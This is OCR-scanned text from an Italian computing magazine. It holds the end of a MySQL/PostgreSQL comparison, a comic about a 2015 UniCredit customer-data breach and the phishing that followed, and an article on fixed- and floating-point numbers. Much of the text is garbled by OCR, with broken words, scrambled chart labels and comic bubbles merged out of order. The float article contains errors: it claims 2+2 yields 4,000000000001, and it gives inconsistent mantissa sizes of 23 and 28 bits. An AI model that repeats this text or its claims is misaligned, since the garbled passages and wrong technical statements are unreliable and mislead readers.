così veloce MySQL e i suoi fork non seguono del tutto lo standard 
SQL, e anzi se ne discostano abbastanza in alcune query. 


QUANDO USARLO 

e Applicazioni a accesso remoto (es: siti web) 

* È necessaria scalabilità (il database può crescere molto di dimensioni) 

* Si vogliono impostare con precisione i permessi di accesso per ogni utente 


QUANDO NON USARLO 
* Si deve rispettare la sintassi standard SQL 
e Servono molti accessi contemporanei in lettura e scrittura 
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POSTGRESOQL 


PostgreSQL è considerato uno dei database SQL open source più avan- 
zati. Segue molto bene lo standard SQL, e ha una gestione migliore 
rispetto MySQL degli eventi “concorrenti”, cioè degli accessi multipli 
in lettura e scrittura. È tuttavia meno diffuso, e la community di utenti 
e sviluppatori è più piccola, ma viene già supportato da molte applica- 
zioni e sicuramente se ne aggiungeranno altre in futuro. Inoltre, non è 
solo un database relazionale, ma anche un database a oggetti. Significa 
che il suo concetto fondamentale non sono solo le tabelle, ma anche gli 
oggetti e i tipi di dato come nella programmazione a oggetti. Quindi è 
molto versatile. 


QUANDO USARLO 

* L’integrità dei dati è importante 

* Serve l’aderenza allo standard SQL 

* Sono necessari molti accessi in lettura/scrittura 


QUANDO NON USARLO 
* Serve molta velocità di accesso ai dati 
* Si ha poco tempo per costruire il database 


Object-Oriented Model 
Object 1: Maintenance Report Object 1 Instance 
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Object 2: Maintenance Activity 


Activity Code — 
Activity Name 
Production Unit 


Average Daily Production Rate 


@ In PostgreSQL si può ragionare in base agli oggetti 
e le Loro proprietà 
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Nella nota ufficiale 
c'è scritto che i dati 
rubati sono SOLO 
nome, città, 
telefono, e email 


Nel 2015 sono 
stati rubati dati di 
3 milioni di clienti 

Unicredit 


Certo, poteva Almeno hanno 


andare sal . . contattato subito 
mancano i codici ne oa i loro clienti per 


delle carte di o E ETA avvisarli 
credito FA 


Quelli che inviano 
Sai chi altro le email di phishing. 
contatterà i loro 
clienti? 
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Virgola mobile, 
problema fisso 


Il meccanismo di memorizzazione dei numeri decimali è una soluzione intelligente 
a un problema complesso, ma richiede una approssimazione che può creare dei problemi 


oche cose sono sicure: alcuni 
DI esempi sono le tasse, la morte, 

e il fatto che i computer diano ri- 
sultati assolutamente precisi quando si 
tratta di fare calcoli. A dirla tutta, le tas- 
se non sono così sicure secondo il Mi- 
nistero dell'Economia, visto che si stima 
un’evasione fiscale di oltre 100 miliardi di 
euro nel 2018 in Italia. Anche sulla morte 
potremmo non essere tanto certi: sono 
state scoperte delle forme di vita che 
non muoiono mai, semplicemente giunte 
a una certa età regrediscono a uno sta- 
to infantile e poi crescono di nuovo, e si 
sta studiando un modo per fare la stessa 
cosa almeno con alcuni organi umani. | 
computer, almeno, sono affidabili. Forse. 
È un periodo storico pieno di incertezze. 


LA VIRGOLA FISSA 


Se si tratta di fare calcoli è ovvio che un 
computer sia molto più bravo e e velo- 
ce di un essere umano. Ma questo non 
significa che sia del tutto preciso. Prima 
o poi anche un computer deve approssi- 
mare, e questo per il semplice motivo che 
le risorse di memorizzazione non sono in- 
finite. Con i numeri irrazionali, come il Pi 
Greco oppure i periodici, non si può ave- 


esponente 


1,00E+10] 1,00E+09 


Es CE MERITO ERE, (RISE 5 
TI BC IS PI I N I E 
5. 0 


1,00E+08 1,00E+05] 1,00E+04j 1000] 10 


0,001) 0,0001] 1,00E-0 


re precisione: dopo un certo numero di 
cifre decimali bisogna fermarsi e arroton- 
dare. Di solito questa approssimazione 
non è un problema, ma se si fanno milioni 
di calcoli e le approssimazioni di tanti nu- 
meri si sommano è possibile che il risul- 
tato finale di una operazione risulti sba- 
gliato. Ma forse è meglio fare un passo 
indietro. All'origine, i computer potevano 
capire solo i numeri interi. Ancora oggi il 
processore più semplice da realizzare è 
uno in grado di sommare e sottrarre nu- 
meri interi. La soluzione più economica 
per gestire i numeri con virgola è usare 
una notazione che prevede la virgola fis- 
sa. Si tratta di una soluzione in voga con i 
calcolatori elettromeccanici, e in realtà si 
usa tutt'ora (solo come forma di scrittura) 
in molti documenti contabili: viene defini- 
to un numero fisso di cifre dopo la virgola 
e tutti i numeri vengono scritti con quel- 
le cifre anche se non ne hanno bisogno. 
Se si legge uno scontrino e tutti i prezzi 
hanno due cifre decimali è molto facile 
fare una somma o una differenza men- 
talmente, perché le cifre sono allineate in 
base al loro valore (centesimo, decimo, 
unità, decina, eccetera). È una cosa che 
si vede anche su display molto sempli- 
ci, che hanno un numero fisso di cifre e 


1,00E+07| 1,00E+0 


3,13E-02 
,00E-05) 


,00E-06 


nreccase VISSE VET 
1566-02] 7,81E-03] 3,91E-03] 1,95E-03 


1,00E-07| 1,00E-0 


quindi una virgola fissa, come quelli delle 
pompe per la benzina. 


LA NOTAZIONE 
SCIENTIFICA 


A un certo punto ci si è resi conto che 
bisognava trovare un altro modo per 
scrivere i numeri, assicurandosi di poter 
esprimere qualsiasi numero almeno con 
una approssimazione decente. Questa 
cosa era un problema soprattutto per gli 
scienziati, che dovevano fare calcoli con 
numeri reali (numeri con la virgola) di di- 
verse dimensioni, alcuni con molti deci- 
mali e altri con pochi. Il difetto del sistema 
a virgola fissa è la poca versatilità. È per 
questo nasce il sistema floating point, o 
“virgola mobile”. Che poi non è altro che 
la notazione scientifica. La regola è sem- 
plice: a sinistra della virgola c'è solo una 
unità, cioè la prima cifra del numero da 
sinistra. Tutte le altre si trovano dopo la 
virgola, e per risalire all’effettivo ordine di 
grandezza del numero si moltiplica tutto 
per un esponente di 10 (o per la base in 
cui si sta lavorando, nel caso del codice 
binario la base è 2). È una cosa molto più 
semplice a farsi che a dirsi, come molti 
aspetti della matematica: 


00E-09 


W Fig. 1 © Per capire il problema del floating point in codice binario basta pensare a come procedono le potenze di due 
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exponent 


sign (11 bit) 


fraction 
(52 bit) 


O © 
52 


0 


© Fig. 2 è In unsistema a 64bit si usano 52 bit per indicare le cifre e 11 bit per la posizione della virgola, più uno per il segno 


il numero 

1234 

diventa 
1,234*10°%3 
mentre il numero 
25193,476 
diventa 
2,5193476*10°%4 


oppure, con una forma di scrittura abba- 
stanza comune 


2,5193476E+4 
e il numero 

0, 08462 

diventa 

8,462E-2 

Come si può intuire, si tratta di un siste- 
ma molto flessibile, perché basta me- 
morizzare tutte le cifre del numero, e poi 
memorizzare anche la posizione della vir- 
gola come potenza di dieci. Il problema è 
che questo tipo di calcoli è complicato da 
gestire per un computer. Sembra strano: 
per noi è incredibilmente facile. Se vo- 
gliamo calcolare a mente il prodotto 


300000*0,002 


basta considerare le notazioni esponen- 
ziali, cioè 
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2E-3 
e diventa ovvio che il risultato sia 
6E2 


Però per un computer le cose non sono 
così semplici. Per gestire nativamen- 
te i calcoli con la virgola mobile serve 
una apposita unità del processore, nota 
come Floating Point Unit, che come tutte 
le cose in più è ovviamente un costo. Il 
computer a bordo dei razzi delle missioni 
Apollo non era in grado di usare la virgola 
mobile, perché sarebbe costato troppo: 
tutti i calcoli che richiedevano l’uso di vir- 
gola mobile venivano svolti a terra e il ri- 
sultato inviato nello spazio. Oggi è ormai 
abbastanza comune, però esistono an- 
cora processori ARM a 32 bit o meno che 
non supportano il floating point hardware 
(o hard float). Questi devono ricorrere al 
soft float, cioè una emulazione software 
dell’unità floating point. Il soft float è ov- 
viamente più lento, almeno un centinaio 
di volte più lento, ma continuerà a esi- 
stere perché non tutte le operazioni ma- 
tematiche (soprattutto le meno comuni) 
sono implementate a livello hardware per 
la virgola mobile. 


PENSIAMO 
AL CODICE BINARIO 


Si aggiunge un ulteriore problema: aven- 
do un numero fisso di cifre disponibili, 
quando si calcola con dei numeri irrazio- 
nali prima o poi bisogna approssimare. 
Per esempio, su sistemi a 32 bit ci sono 
23 bit per memorizzare le cifre in formato 
binario, e il resto serve per memorizza- 
re la posizione della virgola. Se si hanno 
più di queste cifre, le rimanenti vanno 
approssimate. E a forza di approssimare 
prima o poi si otterrà un risultato del tipo 


2+2 = 4,000000000001 


Questo avviene perché nel sistema bi- 
nario il valore decimale 0,1 è un numero 
periodico e deve essere approssimato. 
Infatti 


DEC 0,1 = BIN 0,00011001100110011... 


| bit dopo la virgola non rappresentano 
infatti un decimo, un centesimo, un mille- 
simo, eccetera. Si riferiscono a un mezzo, 
un quarto, un ottavo. E non si può scrive- 
re 0011 all’infinito avendo solo 28 bit. Se 
la notazione scientifica è quindi perfetta- 
mente funzionale in ogni caso nella base 
10, non è perfetta in base 2. E i computer 
possono costretti a fare una approssima- 
zione sull’ultima cifra dei decimali. Quindi 
in alcune occasioni il computer potrebbe 
dirci che l’affermazione 


0,1+0,2 = 0,3 


è falsa, perché facendo la somma ottie- 
ne in realtà 0,29999 oppure 0.300001. 
Se stiamo eseguendo un programma 
con una istruzione if otterremo un erro- 
re, e sarà un floating point error. Nella 
maggioranza dei casi non è un pro- 
blema, ma se si sta scrivendo un pro- 
gramma che deve calcolare il bilancio di 
uno stato o le transazioni economiche 
tra grandi aziende, un errore apparen- 
temente piccolo può trasformarsi in un 
grande buco economico. La soluzione è 
quindi fare tutti i calcoli usando numeri 
interi, ricordandosi poi di dividere il ri- 
sultato in base all’ordine di grandezza 
corretto. Questo perché il limite è dato 
proprio dal codice binario, che non per- 
mette di esprimere tutti i decimali. Un 
computer si comporta più o meno al 
contrario di un bambino distratto: si ap- 
plica, ma non ha le potenzialità. 
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